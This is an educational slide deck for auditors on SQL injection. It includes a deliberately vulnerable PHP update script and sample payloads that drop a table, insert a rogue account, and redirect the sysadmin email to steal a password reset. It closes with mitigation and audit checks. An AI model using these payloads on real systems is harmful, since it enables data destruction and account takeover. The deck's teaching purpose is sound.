  • 2. What is an Injection Attack? • Exploits weak application level security around the “system” type ID • Exploit allows the client, a.k.a. attacker, to “piggyback” code into a web page, and have the “system” ID execute it for them • Can both execute commands and insert / update / delete data Conversys Technologies PVT. Ltd.
  • 3. What is the Danger? • Typically “system” IDs have “all access” rights to the database • When exploited, the attacker can do anything the “system” ID can • Utilizes no special equipment or advanced knowledge Conversys Technologies PVT. Ltd.
  • 4. Industry Joint study by the US department of Commerce and Visa Ranked as one of the top 5 greatest data security vulnerabilities “SQL injection is a technique used to exploit Web-based applications by using client-supplied data in SQL queries. SQL injection attacks are caused primarily by applications that lack input validation checks. Recently, commercial shopping cart products have been the focus of attack by hackers who seek account information. PCI DSS Requirement 6.5 requires that Web-facing applications be developed in accordance with secure coding guidelines to guard against such attacks. “ Conversys Technologies PVT. Ltd.
  • 5. Different Types of Code Injection • SQL Injection (Most prevalent) • LDAP Injection • XML Injection • Others...... * Flaw is not code specific, rather in the web application it is embedded in Conversys Technologies PVT. Ltd.
  • 6. Structure of Web Based Systems • Application logic– Typically built with a scripting language (php, jsp, asp), a lightweight tool that interfaces with the data source and controls the behavior of the program • Data Source – Typically a database, but could also be a flat file, XML file, or another application • The interface between the application and data source is typically done with an embedded language. Embedded systems integrate one type of code into another (such as a php script executing SQL commands) Conversys Technologies PVT. Ltd.
  • 7. How does it work? Review on Client-Server Architecture You (client) request a web page Server responds with the page, as displayed on the client computer Client enters data Server takes data, runs server side script, queries database, returns results Conversys Technologies PVT. Ltd.
  • 8. What really happens when you search? Server has a prewritten SQL query stored in a script select item, picture, from ItemDB where description = ‘$client_input’; You input “american psycho 1st” Prewritten script is then executed by “system” as : select item, picture, from ItemDB where description = “american psycho 1st”; Please Note: You just used the “system” ID to execute a query that YOU wrote. In practice, most “system” ID’s have DBA level access, and are only restricted by the logic built into the application itself. Conversys Technologies PVT. Ltd.
  • 9. Code Example <?PHP session_start(); header("Cache-control: private"); // IE 6 Fix. error_reporting(E_ALL); ?> <html> <body bgcolor = white> <?php $email = $_SESSION['email']; // Variable holding user’s email address $value = stripslashes($_POST['newdata']); // Variable holding data entered $fieldname = $_POST['type']; // Variable holding fieldname to update if ($_SESSION['access_rights'] == 1) { $db = mysql_connect("localhost", "system_id", “password"); // Connects to local DB mysql_select_db("payroll",$db); // selects database to query $query = "update data SET $fieldname='$value' WHERE email = '$email'"; // Prewritten Query $result = mysql_query($query,$db); // executes query echo "<META HTTP-EQUIV='Refresh' CONTENT='0; URL=return.php'>"; } ?> Conversys Technologies PVT. Ltd.
  • 10. How can we exploit this? SQL Query Stored in Application: select item, picture, from ItemDB where description = ‘$client_input’ To commit a SQL Injection Attack, enter into the web site form: x‘;drop table ‘ItemDB The query executed by the “System” ID will now be: select item, picture, from ItemDB where description = ‘x‘;drop table ‘ItemDB’ The server just executed the stored query, and we just effectively destroyed the entire “ItemDB” database! Conversys Technologies PVT. Ltd.
  • 11. Even More Fun… “Add A New User” Canned Query: SELECT email, passwd, login_id, full_name FROM members WHERE email = ‘$user_input’; SQL Attack: x'; INSERT INTO members ('email', 'passwd', 'login_id', 'full_name') VALUES (‘mike@pinch.com',‘mynewPW',‘pinch',‘Mike Pinch') System then Executes: SELECT email, passwd, login_id, full_name FROM members WHERE email = ‘x'; INSERT INTO members ('email', 'passwd', 'login_id', 'full_name') VALUES (‘mike@pinch.com',‘mynewPW',‘pinch',‘Mike Pinch'); I now have my very own account! Conversys Technologies PVT. Ltd.
  • 12. One More for Good Measure “Forgot my Password” Canned Query: SELECT email, passwd, login_id, full_name FROM members WHERE email = ‘$UserInput’; SQL Attack: x'; UPDATE members SET email = ‘pinch@CLIENTX.com' WHERE email = ‘sysadmin@CLIENTX.com System then Executes: SELECT email, passwd, login_id, full_name FROM members WHERE email = x'; UPDATE members SET email = ‘pinch@CLIENTX.com' WHERE email = ‘sysadmin@CLIENTX.com Now just go to forgot my password, type pinch@CLIENTX.com, and the system will conveniently email me the system admin’s password! Conversys Technologies PVT. Ltd.
  • 14. Error Message Masking • Bad • Good Conversys Technologies PVT. Ltd.
  • 15. Error Masking • Blocks real error messages from being displayed to the client • Best Practice All specific errors messages are suppressed, either through using a generic error message, or blocking them altogether. Conversys Technologies PVT. Ltd.
  • 16. How are Attacks Prevented? Sanitize all input including: • Data collected in Forms through browsers • Data collected in URL’s • Data collected through cookies • White/Black List • Mask Error Messages • Continuous Monitoring • New Technique: SQL Firewalls Conversys Technologies PVT. Ltd.
  • 17. Prevalence of Attacks • Injection attacks are extremely powerful, almost always malicious, and nearly undetectable (until its too late) • Danger comes from simplicity – no special hardware or software is necessary. Just syntax knowledge and a browser! • In 2006, 14% of newly released commercial application and open source tools were vulnerable to SQL injection attacks. • A recent study of web sites not masking error messages returned a total of 10.3% Conversys Technologies PVT. Ltd.
  • 18. Integrating into the Audit • Weak controls related to • Cobit Framework preventing injection attacks may – DS 5.3, Identity Management require nature, timing and extent • “All users (internal, external and temporary) of financial statement substantive and their activity on IT systems (business audit procedures. application, system operation, development and maintenance) should be uniquely identifiable. User access rights to systems and data should be in line with defined and • Assistance may be needed from documented business needs and job systems or data management requirements. User access rights are professionals to help identify if requested by user management, approved there were instances in which the by system owner and implemented by the control weaknesses were security-responsible person. User identities and access rights are maintained in a exploited. central repository. Cost-effective technical and procedural measures are deployed and kept current to establish • Cobit Framework (See excerpt) user identification, implement – DS 5.3, Identity Management authentication and enforce access rights.” Conversys Technologies PVT. Ltd.
  • 19. What Systems are Vulnerable? • Predominantly internally developed applications • Web based client-server architecture • Any system where access is available via the web Conversys Technologies PVT. Ltd.
  • 20. How do you determine if a system is vulnerable? • Inquire – Do you have database and server error messages masked? – Do you have a strategy to sanitize all user input to detect SQL injection attacks? – Walk me through how your system prevents SQL injection attempts, IE filtering input, limiting rights. • Observe – Ask client to generate an error message • Should either be generic or non-existent • Inspect – Request code sample showing filtering module logic • Should filter out suspicious characters such as “’,/;&%$” etc • View White/Black List • Attack and Penetration Testing Conversys Technologies PVT. Ltd.
  • 21. Created and Presented by Krishnendu Paul Vice President – Technologies Conversys Technologies Pvt. Ltd. A Maxelor Company References http://www.sarbanes-oxley.com/section.php?level=1&pub_id=Sarbanes-Oxley http://usa.visa.com/download/business/accepting_visa/ops_risk_management/Top_5_Vulnerabilities _Bulletin_August2006.pdf - 2006 Visa USA "Applying an improved economic model to software buy-versus-build decisions", Higaki,Wesley. Hewlett-Packard Journal, August 1995. "Cobit 4.0", IT Governance Institute, 2005 Mitre Corporation, 2006 Conversys Technologies PVT. Ltd.
  • 22. Thanks Conversys Technologies Pvt. Ltd. • Kolkata Office : 7, Bondel Road, Kolkata, West Bengal India – 700019 E-mail: info@conversys.in Telephone: +91-33-64602675 • Pune Office: #204, Casa Grande, Lane No. 8. Koregaon Park, Pune - 411 001 Telephone: +91 20 26052014 • US Office: 15 Corporate Place, Suite# 333 Piscataway, , NJ, 08854 USA Conversys Technologies PVT. Ltd.